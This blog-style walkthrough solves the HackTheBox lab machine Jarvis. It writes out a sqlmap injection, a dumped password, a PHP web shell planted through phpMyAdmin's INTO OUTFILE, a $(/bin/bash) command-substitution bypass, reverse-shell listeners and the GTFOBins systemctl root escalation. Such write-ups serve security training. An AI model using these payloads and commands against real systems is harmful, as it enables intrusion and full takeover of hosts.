Hey all! This is Shreya Pohekar. This walkthrough will solve Jarvis from hackthebox.
Jarvis is an easy linux machine. The initial foothold on the box is based on exploiting the sqli to gain creds of dbadmin. Phpmyadmin is accessible to the users and can be logged via the creds of dbadmin. The initial shell can be obtained by uploading a web shell to the box.
Escalation to user exploits a python file that is running with the privileges of user.
Finally, elevating user privileges is based on exploiting systemctl, as the user can run the binary.
With all that said, Lets get started!
Starting with the nmap scan, I found 2 open ports 22 and 80.
# nmap -sC -sV -o jarvis.nmap 10.10.10.143
So on a obvious note, we have to start further recon with port 80.
Upon visiting http://10.10.10.143 , a page landed up.
On the top left, supersecurehotel.htb was written, so i made an entry to /etc/hosts to check if any new page comes up. But, it didnt!
Getting the initial shell
Clicking through the buttons(book now), I found room.php having a parameter cod.
In the URL I tried writing a quote after cod=3 (as cod=3’) and the page acted weird. I realized that this can be the point of SQL injection. So i quickly captured the request through burp and copied it to a file named room.req.
GET /room.php?cod=1 HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept-Encoding: gzip, deflate
Ran a sqlmap over the request
# sqlmap -r room.req --batch --all
I found the password for DBadmin to be imissyou in the sql dump.
Alongside manual enumeration, I spawned up a gobuster scan that listed a few accessible directories. One of them being phpmyadmin. I could possibly login to the dashboard via the creds obtained.
# gobuster dir --url http://10.10.10.143 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
Upon visiting http://10.10.10.143/phpmyadmin and a login page appeared, and I entered the creds.
Kudos!! Got access to the dashboard.
Scrolling through all the databases, I found nothing interesting.
I then realized that a web shell can be uploaded by running sql commands.
So I hovered to section of sql queries and ran the following command:
SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/backdoor.php"
The command injects a simple webshell into a file backdoor.php that will be uploaded in the root directory (/var/www/html)
The query ran successfully and now i have a file uploaded.
I checked the presence of file by visiting http://10.10.10.143/backdoor.php . Appearance of the blank page confirmed it.
I captured this request using burp and copied a reverse shell from pentest monkey
You can url-encode the shell with ctrl + u. Also, I opend up a nc listener on port 1234.
And got a shell with www-data
Escalation to user : Pepper
I then ran linpeas.sh on the box, and found out that www-data has the privileges to run /var/www/Admin-Utilities/simpler.py with the privileges of user pepper.
I grabbed for the contents of the file and found a method that was pretty interesting. Os.system is called, but to make things difficult, the developer has forbidden certain characters.
I tried around for a while and found out that $(command) can be used as a bash substitution and hence the weak sanitization can be bypassed.
So running $(/bin/bash) executed the binary with the privileges of pepper and got us the shell.
But the shell wasnt good (didnt gave any output for commands).
So again I opened up a listener on port 8888 and entered a reverse shell from pentestmonkey on the obtained shell.
To get a proper shell, perform the following steps (optional)
# python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ ctrl+z # stty raw -echo; # fg (then press enter 2 times and you are back the shell) # stty rows 34 cols 134 # export TERM=xterm
Privilege escalation to root
Initially in the enumeration phase with linpeas.sh, I found out that systemctl (had an suid bit set) was in the pepper group and owned by root and that was interesting. Now since I am pepper, I can now escalate my privileges to root.
We can also find out with the command
# find / -perm -4000 2>/dev/null
I googled for privilege escalation with systemctl and got a link to gtfobins. Nothing can be more better!!
mktemp creates temporary file beneath the specified directory.
And we are echoing a basic shell into the file that would be running with elevated privileges.
SYSTEMD_EDITOR opens up an editor and edit the system.slice with the contents of $TF
Note: A slice unit is a concept for hierarchically managing resources of a group of processes. service and scope units are placed in system.slice by default.
# TF=$(mktemp) # echo /bin/sh > $TF # chmod +x $TF # SYSTEMD_EDITOR=$TF systemctl edit system.slice
And the root is owned!!
Thats all for the blog post!! Thanks for reading!! If you enjoyed reading the post, do like it!
Until then, Happy HAcKing!!